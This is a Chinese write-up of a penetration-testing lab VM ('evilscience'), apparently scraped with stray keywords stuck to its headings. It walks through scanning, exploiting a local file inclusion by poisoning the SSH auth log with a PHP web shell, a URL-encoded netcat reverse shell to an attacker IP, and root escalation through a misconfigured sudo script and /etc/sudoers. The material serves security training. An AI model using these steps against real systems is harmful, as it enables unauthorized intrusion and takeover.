kali渗透综合靶机(十六)--evilscience靶机php
1、主机发现python
1.netdiscover -i eth0 -r 192.168.10.0/24shell
2、端口扫描bash
1. masscan --rate=10000 -p0-65535 192.168.10.195ssh
三端口服务识别测试
1. nmap -sV -T4 -O -p 22,80 192.168.10.195 编码
4、漏洞查找与利用url
1.目录扫描spa
2. 发现http://192.168.10.195/fuck,下载下来没啥用.net
3.发现http://192.168.10.195/index.php?file=about.php 测试存在本地文件包含
4.包含/etc/passwd,失败,尝试用burp进行模糊测试,能够看到能够包含/var/log/auth.log文件,能够利用ssh登陆产生错误日志
5. 利用ssh登陆产生错误日志,能够看到错误信息写入到日志中,能够利用ssh错误日志写入一句话木马
6.利用ssh日志写入一句话木马
7.测试一句话是否成功写入,下图能够看到成功执行,而后能够执行任何系统命令
8.反弹shell,须要对反弹shell中特殊符号进行url编码,不要对整个url进行编码
mknod+backpipe+p+%26%26+nc+192.168.1.66+9999+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe
9.kali端开启监听,而后用python -c ‘import pty;pty.spawn(“/bin/bash”)’,从新打开一个终端
10.上图看到用python -c 打开的一个终端仍是受限的,须要在用awk ‘BEGIN{system(“/bin/bash”)}’从新打开一个终端
提权一:
1.Sudo -l查看是否属于sudo组
2. 能够使用sudo权限不须要密码执行xxxlogauditorxxx.py,查看一下该文件的权限, 该py文件的配置错误,致使能够直接以root权限执行命令,查看脚本存在命令执行漏洞
3.msfvenom生成一个payload,上传到目标,增长执行权限
4.sudo运行该脚本,
5.kali开启监听
提权二:
1.首先给/etc/sudoers加写入权限
2.而后把当前用户以不用密码的登陆方式添加到sudo组
3.sudo -i 得到root权限